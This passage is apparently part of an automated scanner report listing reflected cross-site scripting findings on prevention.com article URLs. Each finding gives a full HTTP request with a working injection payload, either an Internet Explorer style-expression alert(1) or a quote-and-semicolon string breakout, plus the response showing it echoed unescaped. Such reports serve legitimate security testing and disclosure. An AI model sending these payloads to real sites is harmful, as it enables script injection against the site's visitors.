User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/belly-abs9b1b4';959f1b413af/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.100. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c65c'style%3d'x%3aexpression(alert(1))'bc3f9e30175 was submitted in the REST URL parameter 3. This input was echoed as 3c65c'style='x:expression(alert(1))'bc3f9e30175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/belly-abs3c65c'style%3d'x%3aexpression(alert(1))'bc3f9e30175/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:06:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 94647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Belly Abs3c65c'style='x:expression(alert(1))'bc3f9e30175'>
...[SNIP]...

2.101. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e4ec'%3b69855b3c645 was submitted in the REST URL parameter 4. This input was echoed as 3e4ec';69855b3c645 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/belly-abs/flatten-your-belly3e4ec'%3b69855b3c645/article/613888dc78803110VgnVCM10000013281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly3e4ec';69855b3c645/article/613888dc78803110VgnVCM10000013281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.102. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7661'style%3d'x%3aexpression(alert(1))'d1c79f48836 was submitted in the REST URL parameter 5. This input was echoed as a7661'style='x:expression(alert(1))'d1c79f48836 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/belly-abs/flatten-your-belly/articlea7661'style%3d'x%3aexpression(alert(1))'d1c79f48836/613888dc78803110VgnVCM10000013281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1790
Date: Thu, 10 Mar 2011 17:09:03 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 74480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Belly Abs-Flatten Your Belly-Articlea7661'style='x:expression(alert(1))'d1c79f48836'>
...[SNIP]...

2.103. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75b98'%3b7f1c107c0f0 was submitted in the REST URL parameter 6. This input was echoed as 75b98';7f1c107c0f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____75b98'%3b7f1c107c0f0 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:10:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 88885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____75b98';7f1c107c0f0&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.104. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2db1'%3ba3c6da0aec5 was submitted in the REST URL parameter 3. This input was echoed as b2db1';a3c6da0aec5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/cardiob2db1'%3ba3c6da0aec5/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/cardiob2db1';a3c6da0aec5/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.105. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7ccb0'style%3d'x%3aexpression(alert(1))'a574e26ad56 was submitted in the REST URL parameter 3. This input was echoed as 7ccb0'style='x:expression(alert(1))'a574e26ad56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/cardio7ccb0'style%3d'x%3aexpression(alert(1))'a574e26ad56/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:06:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Cardio7ccb0'style='x:expression(alert(1))'a574e26ad56'>
...[SNIP]...

2.106. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6145'%3b6808541011e was submitted in the REST URL parameter 4. This input was echoed as b6145';6808541011e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/cardio/live-the-fat-burning-life-126b6145'%3b6808541011e/article/e9e03a2877df9110VgnVCM20000012281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:08:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126b6145';6808541011e/article/e9e03a2877df9110VgnVCM20000012281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.107. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41d5a'style%3d'x%3aexpression(alert(1))'b8abaa4533d was submitted in the REST URL parameter 5. This input was echoed as 41d5a'style='x:expression(alert(1))'b8abaa4533d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/cardio/live-the-fat-burning-life-126/article41d5a'style%3d'x%3aexpression(alert(1))'b8abaa4533d/e9e03a2877df9110VgnVCM20000012281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1797
Date: Thu, 10 Mar 2011 17:09:32 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 74688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Cardio-Live The Fat Burning Life 126-Article41d5a'style='x:expression(alert(1))'b8abaa4533d'>
...[SNIP]...

2.108. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d7a0'%3b1a5653adf9 was submitted in the REST URL parameter 6. This input was echoed as 1d7a0';1a5653adf9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____1d7a0'%3b1a5653adf9 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:10:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____1d7a0';1a5653adf9&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.109. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e463'%3b56205553b1a was submitted in the REST URL parameter 3. This input was echoed as 7e463';56205553b1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/find-a-workout7e463'%3b56205553b1a/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/find-a-workout7e463';56205553b1a/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.110. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e788f'style%3d'x%3aexpression(alert(1))'6ab22e02f was submitted in the REST URL parameter 3. This input was echoed as e788f'style='x:expression(alert(1))'6ab22e02f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/find-a-workoute788f'style%3d'x%3aexpression(alert(1))'6ab22e02f/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:06:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Find A Workoute788f'style='x:expression(alert(1))'6ab22e02f'>
...[SNIP]...

2.111. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58d30'%3bcf4179973ea was submitted in the REST URL parameter 4. This input was echoed as 58d30';cf4179973ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/find-a-workout/total-body-toning58d30'%3bcf4179973ea/article/31e69dc91e22e110VgnVCM10000013281eac____/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/find-a-workout/total-body-toning58d30';cf4179973ea/article/31e69dc91e22e110VgnVCM10000013281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.112. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19f97'style%3d'x%3aexpression(alert(1))'7bb7b9ba7b7 was submitted in the REST URL parameter 5. This input was echoed as 19f97'style='x:expression(alert(1))'7bb7b9ba7b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/find-a-workout/total-body-toning/article19f97'style%3d'x%3aexpression(alert(1))'7bb7b9ba7b7/31e69dc91e22e110VgnVCM10000013281eac____/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1793
Date: Thu, 10 Mar 2011 17:08:16 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 74609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Find A Workout-Total Body Toning-Article19f97'style='x:expression(alert(1))'7bb7b9ba7b7'>
...[SNIP]...

2.113. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3ba5'%3b71644938b8 was submitted in the REST URL parameter 6. This input was echoed as d3ba5';71644938b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____d3ba5'%3b71644938b8/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:09:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____d3ba5';71644938b8&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.114. http://www.prevention.com/health/health/a-spoonful-of-health/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/a-spoonful-of-health/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccb17'%3b29e646bb194 was submitted in the REST URL parameter 3. This input was echoed as ccb17';29e646bb194 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/ccb17'%3b29e646bb194/ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
